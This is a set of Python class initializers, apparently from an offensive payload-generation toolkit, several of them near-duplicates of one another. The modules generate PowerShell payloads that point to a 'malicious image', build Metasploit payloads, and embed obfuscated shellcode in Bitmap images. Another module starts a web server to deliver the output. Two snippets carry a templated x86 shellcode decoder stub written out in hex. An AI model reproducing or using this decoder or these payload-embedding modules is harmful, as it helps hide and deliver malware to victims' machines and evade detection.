def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["url"] = ["", "Url that point to the malicious image"] self.description = "Module to generate Powershell payload" self.module_name = "powershell"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["payfiletype"] = ["", "Metasploit Payload Filetype"] self.vars["ipaddr"] = ["", "Your Ip Address To Use"] self.description = " Module for generate metasploit payload + install metasploit (WINDOWS MODULE)" self.module_name = "\033[33mroot@dkmcpro:~/winrawhex#\033[33m"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["url"] = ["", "Url that point to the malicious image"] self.vars["rand"] = ["true", "Use random variables name"] self.description = "Module to generate Powershell payload" self.module_name = "root@dkmcpro:~/ps#"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["payfiletype"] = ["", "Metasploit Payload Filetype"] self.vars["insmsf"] = ["", "Install Metasploit On Your Linux Computer"] self.vars["ipaddr"] = ["", "Your Ip Address To Use"] self.vars["addkalirepo"] = [ "", "Add Kali Linux Repository To Your Linux System!" ] self.description = " Module for generate metasploit payload + install metasploit" self.module_name = "\033[33mroot@dkmcpro:~/rawhex#\033[33m"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["shellcode"] = ["", "Shellcode payload using \\x41\\x41 format"] self.vars["shellcode-path"] = ["", "Path to a raw shellcode file"] self.vars["source"] = ["sample/default.bmp", "Image source file path"] self.vars["output"] = ["output/output-%d.bmp" % time.time(), "Output file path"] self.vars["debug"] = ["false", "Show debug output. More verbose"] self.description = "Module to generate malicious Bitmap image with embedded obfuscation shellcode" self.module_name = "generate" self.image = {} self.decoder = "\xeb\x44\x58\x68[RAND1]\x31\xc9\x89\xcb\x6a\x04\x5a\x68[RAND2]\xff\x30\x59\x0f\xc9\x43\x31\xd9\x81\xf9[MAGIC]\x68[RAND3]\x75\xea\x0f\xcb\xb9[SIZE/4]\x01\xd0\x31\x18\x68[RAND4]\xe2\xf4\x2d[SIZE]\xff\xe0\xe8\xb7\xff\xff\xff"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["folder"] = [ os.getcwd() + "/output/", "Base folder used to deliver files" ] self.vars["port"] = ["80", "Port used to bind the web server"] self.vars["https"] = ["false", "Use HTTPS"] self.vars["certificate"] = [ "core/util/cert/default.pem", "Certificate path" ] self.description = "Module to launch a web server" self.module_name = "root@dkmcpro:~/web#"
def __init__(self, ui): ModuleObject.__init__(self) self.ui = ui self.vars = {} self.vars["shellcode"] = [ "", "see on shellcodes/msfshellcode.txt and see the READMEBEFOREUSINGSHELLCODE.txt" ] self.vars["source"] = ["sample/haha.bmp", "Image source file path"] self.vars["output"] = [ "output/output-%d.bmp" % time.time(), "Output file path" ] self.vars["debug"] = ["false", "Show debug output. More verbose"] self.description = "Module to generate malicious Bitmap image with embedded obfuscation shellcode" self.module_name = "root@dkmcpro:~/gen#" self.image = {} self.decoder = "\xeb\x44\x58\x68[RAND1]\x31\xc9\x89\xcb\x6a\x04\x5a\x68[RAND2]\xff\x30\x59\x0f\xc9\x43\x31\xd9\x81\xf9[MAGIC]\x68[RAND3]\x75\xea\x0f\xcb\xb9[SIZE/4]\x01\xd0\x31\x18\x68[RAND4]\xe2\xf4\x2d[SIZE]\xff\xe0\xe8\xb7\xff\xff\xff"